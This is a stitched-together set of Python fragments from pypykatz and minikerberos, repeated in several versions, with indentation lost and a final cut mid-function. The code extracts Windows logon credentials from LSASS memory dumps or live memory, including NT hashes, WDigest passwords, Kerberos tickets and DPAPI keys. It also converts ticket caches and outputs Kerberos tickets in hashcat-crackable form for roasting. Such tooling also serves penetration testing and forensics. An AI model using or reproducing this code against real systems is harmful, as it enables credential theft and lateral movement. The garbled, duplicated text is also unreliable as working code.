def main():
import argparse
parser = argparse.ArgumentParser(
description='Convert kirbi file(s) to a single ccache file')
parser.add_argument('kirbi',
help='path to the kirbi file or a of kirbi files')
parser.add_argument('ccache', help='ccache file name to be created')
parser.add_argument('-v', '--verbose', action='count', default=0)
args = parser.parse_args()
if args.verbose == 0:
logging.basicConfig(level=logging.INFO)
elif args.verbose == 1:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=1)
abs_path = os.path.abspath(args.kirbi)
if os.path.isdir(abs_path):
logging.info('Parsing kirbi files in directory %s' % abs_path)
cc = CCACHE.from_kirbidir(abs_path)
cc.to_file(args.ccache)
else:
logging.info('Parsing kirbi file %s' % abs_path)
cc = CCACHE.from_kirbifile(abs_path)
cc.to_file(args.ccache)
logging.info('Done!')
def __init__(self, reader, sysinfo):
self.reader = reader
self.sysinfo = sysinfo
self.credentials = []
self.architecture = None
self.operating_system = None
self.buildnumber = None
self.lsa_decryptor = None
self.logon_sessions = {}
self.orphaned_creds = []
self.kerberos_ccache = CCACHE()
def main():
import argparse
parser = argparse.ArgumentParser(description='Prints CCACHE file info')
parser.add_argument('ccachefile', help='input CCACHE file')
parser.add_argument('-v', '--verbose', action='count', default=0)
args = parser.parse_args()
###### VERBOSITY
if args.verbose == 0:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.DEBUG)
logging.basicConfig(level=logging.INFO)
logging.debug('Opening file %s' % args.ccachefile)
cc = CCACHE.from_file(args.ccachefile)
table = []
table.append(['id'] + Credential.summary_header())
i = 0
for cred in cc.credentials:
table.append([str(i)] + cred.summary())
i += 1
print() #this line intentionally left blank
print_table(table)
def get_kerberos(self): if CCACHE is None: return self.kerberos_ccache = CCACHE() dec_template = KerberosTemplate.get_template(self.sysinfo) dec = KerberosDecryptor( self.reader, dec_template, self.lsa_decryptor, self.sysinfo ) dec.start() for cred in dec.credentials: for ticket in cred.tickets: for fn in ticket.kirbi_data: self.kerberos_ccache.add_kirbi(ticket.kirbi_data[fn].native) if cred.luid in self.logon_sessions: self.logon_sessions[cred.luid].kerberos_creds.append(cred) else: self.orphaned_creds.append(cred)
def get_kerberos(self):
try:
from minikerberos.ccache import CCACHE
except ImportError:
raise ImportError('You need to install minikerberos dependency')
self.kerberos_ccache = CCACHE()
dec_template = KerberosTemplate.get_template(self.sysinfo)
dec = KerberosDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
for ticket in cred.tickets:
for fn in ticket.kirbi_data:
self.kerberos_ccache.add_kirbi(
ticket.kirbi_data[fn].native)
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].kerberos_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def main():
import argparse
parser = argparse.ArgumentParser(
description=
'Parses CCACHE file and outputs all TGS tickets in a hashcat-crackable format'
)
parser.add_argument('ccache', help='CCACHE file to roast')
args = parser.parse_args()
ccache = CCACHE.from_file(args.ccache)
for hash in ccache.get_hashes(all_hashes=True):
print(hash)
def add_secret(self, st: KerberosSecretType, secret: str):
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
if secret == '' or secret is None:
self.password = getpass.getpass(
'Enter Kerberos credential password:')
else:
self.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
self.nt_hash = secret
self.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES128:
self.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.AES256:
self.kerberos_key_aes_256 = secret
elif st == KerberosSecretType.DES:
self.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
self.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
self.ccache = CCACHE.from_file(secret)
def from_connection_string(s):
"""
Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>
"""
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
if secret == '' or secret is None:
cred.password = getpass.getpass(
'Enter Kerberos credential password:')
else:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
cred.target = target
return cred
def main():
import argparse
parser = argparse.ArgumentParser(
description='Convert ccache file to kirbi file(s)')
parser.add_argument('ccache', help='path to the ccache file')
parser.add_argument(
'kirbidir', help='output directory fir the extracted kirbi file(s)')
parser.add_argument('-v', '--verbose', action='count', default=0)
args = parser.parse_args()
if args.verbose == 0:
logging.basicConfig(level=logging.INFO)
elif args.verbose == 1:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=1)
logging.info('Parsing CCACHE file')
cc = CCACHE.from_file(args.ccache)
logging.info('Extracting kirbi file(s)')
cc.to_kirbidir(args.kirbidir)
logging.info('Done!')
class pypykatz:
def __init__(self, reader, sysinfo):
self.reader = reader
self.sysinfo = sysinfo
self.credentials = []
self.architecture = None
self.operating_system = None
self.buildnumber = None
self.lsa_decryptor = None
self.logon_sessions = {}
self.orphaned_creds = []
self.kerberos_ccache = CCACHE()
def to_dict(self):
t = {}
t['logon_sessions'] = {}
for ls in self.logon_sessions:
# print(ls)
t['logon_sessions'][ls] = (self.logon_sessions[ls].to_dict())
t['orphaned_creds'] = []
for oc in self.orphaned_creds:
t['orphaned_creds'].append(oc.to_dict())
return t
def to_json(self):
return json.dumps(self.to_dict(), cls=UniversalEncoder)
@staticmethod
def go_live():
if platform.system() != 'Windows':
raise Exception('Live parsing will only work on Windows')
from pypykatz.commons.readers.local.live_reader import LiveReader
reader = LiveReader()
sysinfo = KatzSystemInfo.from_live_reader(reader)
mimi = pypykatz(reader.get_buffered_reader(), sysinfo)
mimi.start()
return mimi
@staticmethod
def parse_minidump_file(filename):
try:
minidump = MinidumpFile.parse(filename)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
except Exception as e:
logger.exception('Minidump parsing error!')
raise e
try:
mimi = pypykatz(reader, sysinfo)
mimi.start()
except Exception as e:
#logger.info('Credentials parsing error!')
mimi.log_basic_info()
raise e
return mimi
@staticmethod
def parse_minidump_bytes(data):
"""
Parses LSASS minidump file bytes.
data needs to be bytearray
"""
minidump = MinidumpFile.parse_bytes(data)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
@staticmethod
def parse_minidump_external(handle):
"""
Parses LSASS minidump file based on the file object.
File object can really be any object as longs as
it implements read, seek, tell functions with the
same parameters as a file object would.
handle: file like object
"""
minidump = MinidumpFile.parse_external(handle)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
@staticmethod
def parse_minidump_buffer(buff):
"""
Parses LSASS minidump file which contents are in a bytes buffer
buff: io.BytesIO object
"""
minidump = MinidumpFile.parse_buff(buff)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
@staticmethod
def parse_memory_dump_rekall(filename, override_timestamp=None):
from pypykatz.commons.readers.rekall.rekallreader import RekallReader
reader = RekallReader.from_memory_file(filename, override_timestamp)
sysinfo = KatzSystemInfo.from_rekallreader(reader)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
@staticmethod
def go_rekall(session, override_timestamp=None, buildnumber=None):
from pypykatz.commons.readers.rekall.rekallreader import RekallReader
reader = RekallReader.from_session(session, override_timestamp,
buildnumber)
sysinfo = KatzSystemInfo.from_rekallreader(reader)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
@staticmethod
def go_volatility3(vol3_obj):
from pypykatz.commons.readers.volatility3.volreader import Vol3Reader, vol3_treegrid
reader = Vol3Reader(vol3_obj)
sysinfo = reader.get_sysinfo()
mimi = pypykatz(reader, sysinfo)
mimi.start()
return vol3_treegrid(mimi)
def log_basic_info(self):
"""
In case of error, please attach this to the issues page
"""
logger.info('===== BASIC INFO. SUBMIT THIS IF THERE IS AN ISSUE =====')
logger.info('pypyKatz version: %s' % __version__)
logger.info('CPU arch: %s' % self.sysinfo.architecture.name)
logger.info('OS: %s' % self.sysinfo.operating_system)
logger.info('BuildNumber: %s' % self.sysinfo.buildnumber)
logger.info('MajorVersion: %s ' % self.sysinfo.major_version)
logger.info('MSV timestamp: %s' % self.sysinfo.msv_dll_timestamp)
logger.info('===== BASIC INFO END =====')
def get_logoncreds(self):
credman_template = CredmanTemplate.get_template(self.sysinfo)
msv_template = MsvTemplate.get_template(self.sysinfo)
logoncred_decryptor = MsvDecryptor(self.reader, msv_template,
self.lsa_decryptor,
credman_template, self.sysinfo)
logoncred_decryptor.start()
self.logon_sessions = logoncred_decryptor.logon_sessions
def get_lsa_bruteforce(self):
#good luck!
logger.info('Testing all available templates! Expect warnings!')
for lsa_dec_template in LsaTemplate.get_template_brute(self.sysinfo):
try:
lsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template,
self.sysinfo)
logger.debug(lsa_dec.dump())
except:
pass
else:
logger.info(
'Lucky you! Brutefoce method found a -probably- working template!'
)
return lsa_dec
def get_lsa(self):
#trying with automatic template detection
try:
lsa_dec_template = LsaTemplate.get_template(self.sysinfo)
lsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template,
self.sysinfo)
logger.debug(lsa_dec.dump())
except:
logger.exception(
'Failed to automatically detect correct LSA template!')
lsa_dec = self.get_lsa_bruteforce()
if lsa_dec is None:
raise Exception('All detection methods failed.')
return lsa_dec
else:
return lsa_dec
def get_wdigest(self):
decryptor_template = WdigestTemplate.get_template(self.sysinfo)
decryptor = WdigestDecryptor(self.reader, decryptor_template,
self.lsa_decryptor, self.sysinfo)
decryptor.start()
for cred in decryptor.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].wdigest_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_tspkg(self):
tspkg_dec_template = TspkgTemplate.get_template(self.sysinfo)
tspkg_dec = TspkgDecryptor(self.reader, tspkg_dec_template,
self.lsa_decryptor, self.sysinfo)
tspkg_dec.start()
for cred in tspkg_dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].tspkg_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_ssp(self):
dec_template = SspTemplate.get_template(self.sysinfo)
dec = SspDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].ssp_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_livessp(self):
livessp_dec_template = LiveSspTemplate.get_template(self.sysinfo)
livessp_dec = LiveSspDecryptor(self.reader, livessp_dec_template,
self.lsa_decryptor, self.sysinfo)
livessp_dec.start()
for cred in livessp_dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].livessp_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_dpapi(self):
dec_template = DpapiTemplate.get_template(self.sysinfo)
dec = DpapiDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].dpapi_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_kerberos(self):
dec_template = KerberosTemplate.get_template(self.sysinfo)
dec = KerberosDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
for ticket in cred.tickets:
for fn in ticket.kirbi_data:
self.kerberos_ccache.add_kirbi(
ticket.kirbi_data[fn].native)
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].kerberos_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def start(self):
#self.log_basic_info()
#input()
self.lsa_decryptor = self.get_lsa()
self.get_logoncreds()
self.get_wdigest()
self.get_kerberos()
self.get_tspkg()
self.get_ssp()
self.get_livessp()
self.get_dpapi()
class pypykatz:
def __init__(self, reader, sysinfo):
self.reader = reader
self.sysinfo = sysinfo
self.credentials = []
self.architecture = None
self.operating_system = None
self.buildnumber = None
self.lsa_decryptor = None
self.logon_sessions = []
self.orphaned_creds = []
self.kerberos_ccache = CCACHE()
#self.logger = logging.getLogger('pypykatz')
def to_dict(self):
t = {}
t['logon_sessions'] = self.logon_sessions
t['orphaned_creds'] = self.orphaned_creds
return t
def to_json(self):
return json.dumps(self.to_dict())
@staticmethod
def go_live():
reader = LiveReader()
sysinfo = KatzSystemInfo.from_live_reader(reader)
mimi = pypykatz(reader.get_buffered_reader(), sysinfo)
mimi.start()
return mimi
@staticmethod
def parse_minidump_file(filename):
try:
minidump = MinidumpFile.parse(filename)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
except Exception as e:
logger.exception('Minidump parsing error!')
raise e
try:
mimi = pypykatz(reader, sysinfo)
mimi.start()
except Exception as e:
#logger.info('Credentials parsing error!')
mimi.log_basic_info()
raise e
return mimi
@staticmethod
def parse_minidump_bytes(data):
minidump = MinidumpFile.parse_bytes(data)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
@staticmethod
def parse_minidump_buffer(buff):
minidump = MinidumpFile.parse_buff(buff)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
@staticmethod
def parse_memory_dump_rekall(filename, override_timestamp=None):
from pypykatz.commons.readers.rekall.rekallreader import RekallReader
reader = RekallReader.from_memory_file(filename, override_timestamp)
sysinfo = KatzSystemInfo.from_rekallreader(reader)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
@staticmethod
def go_rekall(session, override_timestamp=None, buildnumber=None):
from pypykatz.commons.readers.rekall.rekallreader import RekallReader
reader = RekallReader.from_session(session, override_timestamp,
buildnumber)
sysinfo = KatzSystemInfo.from_rekallreader(reader)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
def log_basic_info(self):
"""
In case of error, please attach this to the issues page
"""
logger.info('===== BASIC INFO. SUBMIT THIS IF THERE IS AN ISSUE =====')
logger.info('CPU arch: %s' % self.sysinfo.architecture.name)
logger.info('OS: %s' % self.sysinfo.operating_system)
logger.info('BuildNumber: %s' % self.sysinfo.buildnumber)
logger.info('MajorVersion: %s ' % self.sysinfo.major_version)
logger.info('MSV timestamp: %s' % self.sysinfo.msv_dll_timestamp)
logger.info('===== BASIC INFO END =====')
def get_logoncreds(self):
credman_template = CredmanTemplate.get_template(self.sysinfo)
msv_template = MsvTemplate.get_template(self.sysinfo)
logoncred_decryptor = MsvDecryptor(self.reader, msv_template,
self.lsa_decryptor,
credman_template, self.sysinfo)
logoncred_decryptor.start()
self.logon_sessions = logoncred_decryptor.logon_sessions
def get_lsa(self):
lsa_dec_template = LsaTemplate.get_template(self.sysinfo)
lsa_dec = LsaDecryptor(self.reader, lsa_dec_template, self.sysinfo)
logger.debug(lsa_dec.dump())
return lsa_dec
def get_wdigest(self):
decryptor_template = WdigestTemplate.get_template(self.sysinfo)
decryptor = WdigestDecryptor(self.reader, decryptor_template,
self.lsa_decryptor, self.sysinfo)
decryptor.start()
for cred in decryptor.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].wdigest_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_tspkg(self):
tspkg_dec_template = TspkgTemplate.get_template(self.sysinfo)
tspkg_dec = TspkgDecryptor(self.reader, tspkg_dec_template,
self.lsa_decryptor, self.sysinfo)
tspkg_dec.start()
for cred in tspkg_dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].tspkg_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_ssp(self):
dec_template = SspTemplate.get_template(self.sysinfo)
dec = SspDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].ssp_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_livessp(self):
livessp_dec_template = LiveSspTemplate.get_template(self.sysinfo)
livessp_dec = LiveSspDecryptor(self.reader, livessp_dec_template,
self.lsa_decryptor, self.sysinfo)
livessp_dec.start()
for cred in livessp_dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].livessp_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_dpapi(self):
dec_template = DpapiTemplate.get_template(self.sysinfo)
dec = DpapiDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].dpapi_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_kerberos(self):
dec_template = KerberosTemplate.get_template(self.sysinfo)
dec = KerberosDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
for ticket in cred.tickets:
for fn in ticket.kirbi_data:
self.kerberos_ccache.add_kirbi(
ticket.kirbi_data[fn].native)
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].kerberos_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def start(self):
#self.log_basic_info()
#input()
self.lsa_decryptor = self.get_lsa()
self.get_logoncreds()
self.get_wdigest()
self.get_kerberos()
self.get_tspkg()
self.get_ssp()
self.get_livessp()
self.get_dpapi()
#
# Author:
# Tamas Jos (@skelsec)
#
import os
import logging
from minikerberos.ccache import CCACHE
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='Convert ccache file to kirbi file(s)')
parser.add_argument('ccache', help='path to the ccache file')
parser.add_argument(
'kirbidir', help='output directory fir the extracted kirbi file(s)')
parser.add_argument('-v', '--verbose', action='count', default=0)
args = parser.parse_args()
if args.verbose == 0:
logging.basicConfig(level=logging.INFO)
elif args.verbose == 1:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=1)
logging.info('Parsing CCACHE file')
cc = CCACHE.from_file(args.ccache)
logging.info('Extracting kirbi file(s)')
cc.to_kirbidir(args.kirbidir)
logging.info('Done!')
from minikerberos.ccache import CCACHE
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Convert kirbi file(s) to a single ccache file')
parser.add_argument('kirbi', help='path to the kirbi file or a of kirbi files')
parser.add_argument('ccache', help='ccache file name to be created')
parser.add_argument('-v', '--verbose', action='count', default=0)
args = parser.parse_args()
if args.verbose == 0:
logging.basicConfig(level=logging.INFO)
elif args.verbose == 1:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=1)
abs_path = os.path.abspath(args.kirbi)
if os.path.isdir(abs_path):
logging.info('Parsing kirbi files in directory %s' % abs_path)
cc = CCACHE.from_kirbidir(abs_path)
cc.to_file(args.ccache)
else:
logging.info('Parsing kirbi file %s' % abs_path)
cc = CCACHE.from_kirbifile(abs_path)
cc.to_file(args.ccache)
logging.info('Done!')
def main():
import argparse
parser = argparse.ArgumentParser(
description='Tool to manipulate CCACHE files')
subparsers = parser.add_subparsers(help='commands')
subparsers.required = True
subparsers.dest = 'command'
roast_group = subparsers.add_parser(
'roast', help='Lists all tickets in hashcat-friendly format')
roast_group.add_argument('-a',
'--allhash',
action='store_true',
help='Process all tickets, regardless of enctype')
roast_group.add_argument('-o', '--outfile', help='Output hash file name')
list_group = subparsers.add_parser('list',
help='List all tickets in the file')
delete_group = subparsers.add_parser(
'del',
help=
'Delete ticket(s) from file, store the new ccache file in a specified filename, or an automatically generated one'
)
delete_group.add_argument('-o',
'--outfile',
help='Output ccache file name')
delete_group.add_argument('-i',
'--id',
type=int,
action='append',
help='Ticket ID to delete',
required=True)
parser.add_argument('ccachefile', help='input CCACHE file')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
logging.debug('Opening file %s' % args.ccachefile)
cc = CCACHE.from_file(args.ccachefile)
if args.command == 'list':
table = []
table.append(['id'] + Credential.summary_header())
i = 0
for cred in cc.credentials:
table.append([str(i)] + cred.summary())
i += 1
print() #this line intentionally left blank
print_table(table)
elif args.command == 'roast':
if args.outfile:
with open(args.outfile, 'wb') as f:
for h in cc.get_hashes(all_hashes=args.allhash):
f.write(h.encode() + b'\r\n')
else:
for h in cc.get_hashes(all_hashes=args.allhash):
print(h)
elif args.command == 'del':
#delete
output_filename = os.path.join(
os.path.dirname(os.path.abspath(args.ccachefile)),
'%s.edited.ccache' %
ntpath.basename(args.ccachefile)) #sorry for this, im tired now :(
id = args.id
temp_cc = CCACHE()
temp_cc.file_format_version = cc.file_format_version
temp_cc.headerlen = cc.headerlen
temp_cc.headers = cc.headers
temp_cc.primary_principal = cc.primary_principal
i = 0
for cred in cc.credentials:
if i in id:
i += 1
continue
temp_cc.credentials.append(cred)
i += 1
logging.info('Writing edited file to %s' % output_filename)
temp_cc.to_file(output_filename)
class katz:
def __init__(self, reader, sysinfo):
self.reader = reader
self.sysinfo = sysinfo
self.credentials = []
self.architecture = None
self.operating_system = None
self.buildnumber = None
self.lsa_decryptor = None
self.logon_sessions = []
self.orphaned_creds = []
self.kerberos_ccache = CCACHE()
self.logger = logging.getLogger('pypykatz')
@staticmethod
def parse_minidump_file(filename):
minidump = MinidumpFile.parse(filename)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
mimi = katz(reader, sysinfo)
mimi.start()
return mimi
def start(self):
self.log_basic_info()
self.lsa_decryptor = self.get_lsa()
self.get_logoncreds()
self.get_wdigest()
self.get_kerberos()
self.get_tspkg()
self.get_ssp()
self.get_livessp()
self.get_dpapi()
def log_basic_info(self):
"""
In case of error, please attach this to the issues page
"""
self.logger.debug(
'===== BASIC INFO. SUBMIT THIS IF THERE IS AN ISSUE =====')
self.logger.debug('CPU arch: %s' % self.sysinfo.architecture.name)
self.logger.debug('OS: %s' % self.sysinfo.operating_system)
self.logger.debug('BuildNumber: %s' % self.sysinfo.buildnumber)
self.logger.debug('MajorVersion: %s ' % self.sysinfo.major_version)
self.logger.debug('MSV timestamp: %s' % self.sysinfo.msv_dll_timestamp)
self.logger.debug('===== BASIC INFO END =====')
def get_logoncreds(self):
credman_template = CredmanTemplate.get_template(self.sysinfo)
msv_template = MsvTemplate.get_template(self.sysinfo)
logoncred_decryptor = MsvDecryptor(self.reader, msv_template,
self.lsa_decryptor,
credman_template, self.sysinfo)
logoncred_decryptor.start()
self.logon_sessions = logoncred_decryptor.logon_sessions
def get_lsa(self):
lsa_dec_template = LsaTemplate.get_template(self.sysinfo)
lsa_dec = LsaDecryptor(self.reader, lsa_dec_template, self.sysinfo)
self.logger.debug(lsa_dec.dump())
return lsa_dec
def get_wdigest(self):
decryptor_template = WdigestTemplate.get_template(self.sysinfo)
decryptor = WdigestDecryptor(self.reader, decryptor_template,
self.lsa_decryptor, self.sysinfo)
decryptor.start()
for cred in decryptor.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].wdigest_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_tspkg(self):
tspkg_dec_template = TspkgTemplate.get_template(self.sysinfo)
tspkg_dec = TspkgDecryptor(self.reader, tspkg_dec_template,
self.lsa_decryptor, self.sysinfo)
tspkg_dec.start()
for cred in tspkg_dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].tspkg_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_ssp(self):
dec_template = SspTemplate.get_template(self.sysinfo)
dec = SspDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].ssp_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_livessp(self):
livessp_dec_template = LiveSspTemplate.get_template(self.sysinfo)
livessp_dec = LiveSspDecryptor(self.reader, livessp_dec_template,
self.lsa_decryptor, self.sysinfo)
livessp_dec.start()
for cred in livessp_dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].livessp_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_dpapi(self):
dec_template = DpapiTemplate.get_template(self.sysinfo)
dec = DpapiDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].dpapi_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_kerberos(self):
dec_template = KerberosTemplate.get_template(self.sysinfo)
dec = KerberosDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
for ticket in cred.tickets:
for fn in ticket.kirbi_data:
self.kerberos_ccache.add_kirbi(
ticket.kirbi_data[fn].native)
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].kerberos_creds.append(cred)
else:
self.orphaned_creds.append(cred)
class pypykatz:
def __init__(self, reader, sysinfo, logger=None):
self.reader = reader
self.sysinfo = sysinfo
self.credentials = []
self.architecture = None
self.operating_system = None
self.buildnumber = None
self.lsa_decryptor = None
self.logon_sessions = []
self.orphaned_creds = []
self.kerberos_ccache = None
self.logger = logger if logger else logging.getLogger('pypykatz')
def to_dict(self):
t = {}
t['logon_sessions'] = {}
for ls in self.logon_sessions:
# print(ls)
t['logon_sessions'][ls] = (self.logon_sessions[ls].to_dict())
t['orphaned_creds'] = []
for oc in self.orphaned_creds:
t['orphaned_creds'].append(oc.to_dict())
return t
def to_json(self):
return json.dumps(self.to_dict())
@staticmethod
def go_live():
reader = LiveReader()
sysinfo = KatzSystemInfo.from_live_reader(reader)
mimi = pypykatz(reader.get_buffered_reader(), sysinfo)
mimi.start()
return mimi
def log_basic_info(self):
"""
In case of error, please attach this to the issues page
"""
self.logger.debug('===== BASIC INFO. SUBMIT THIS IF THERE IS AN ISSUE =====')
self.logger.debug('CPU arch: %s' % self.sysinfo.architecture.name)
self.logger.debug('OS: %s' % self.sysinfo.operating_system)
self.logger.debug('BuildNumber: %s' % self.sysinfo.buildnumber)
self.logger.debug('MajorVersion: %s ' % self.sysinfo.major_version)
self.logger.debug('MSV timestamp: %s' % self.sysinfo.msv_dll_timestamp)
self.logger.debug('===== BASIC INFO END =====')
def get_logoncreds(self):
credman_template = CredmanTemplate.get_template(self.sysinfo)
msv_template = MsvTemplate.get_template(self.sysinfo)
logoncred_decryptor = MsvDecryptor(self.reader, msv_template, self.lsa_decryptor, credman_template, self.sysinfo)
logoncred_decryptor.start()
self.logon_sessions = logoncred_decryptor.logon_sessions
def get_lsa(self):
lsa_dec_template = LsaTemplate.get_template(self.sysinfo)
lsa_dec = LsaDecryptor(self.reader, lsa_dec_template, self.sysinfo)
# self.logger.debug(lsa_dec.dump())
return lsa_dec
def get_wdigest(self):
decryptor_template = WdigestTemplate.get_template(self.sysinfo)
decryptor = WdigestDecryptor(self.reader, decryptor_template, self.lsa_decryptor, self.sysinfo)
decryptor.start()
for cred in decryptor.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].wdigest_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_tspkg(self):
tspkg_dec_template = TspkgTemplate.get_template(self.sysinfo)
tspkg_dec = TspkgDecryptor(self.reader,tspkg_dec_template, self.lsa_decryptor, self.sysinfo)
tspkg_dec.start()
for cred in tspkg_dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].tspkg_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_ssp(self):
dec_template = SspTemplate.get_template(self.sysinfo)
dec = SspDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)
dec.start()
for cred in dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].ssp_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_livessp(self):
livessp_dec_template = LiveSspTemplate.get_template(self.sysinfo)
livessp_dec = LiveSspDecryptor(self.reader, livessp_dec_template, self.lsa_decryptor, self.sysinfo)
livessp_dec.start()
for cred in livessp_dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].livessp_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_dpapi(self):
dec_template = DpapiTemplate.get_template(self.sysinfo)
dec = DpapiDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)
dec.start()
for cred in dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].dpapi_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_kerberos(self):
if CCACHE is None:
return
self.kerberos_ccache = CCACHE()
dec_template = KerberosTemplate.get_template(self.sysinfo)
dec = KerberosDecryptor(
self.reader, dec_template, self.lsa_decryptor, self.sysinfo
)
dec.start()
for cred in dec.credentials:
for ticket in cred.tickets:
for fn in ticket.kirbi_data:
self.kerberos_ccache.add_kirbi(ticket.kirbi_data[fn].native)
if cred.luid in self.logon_sessions:
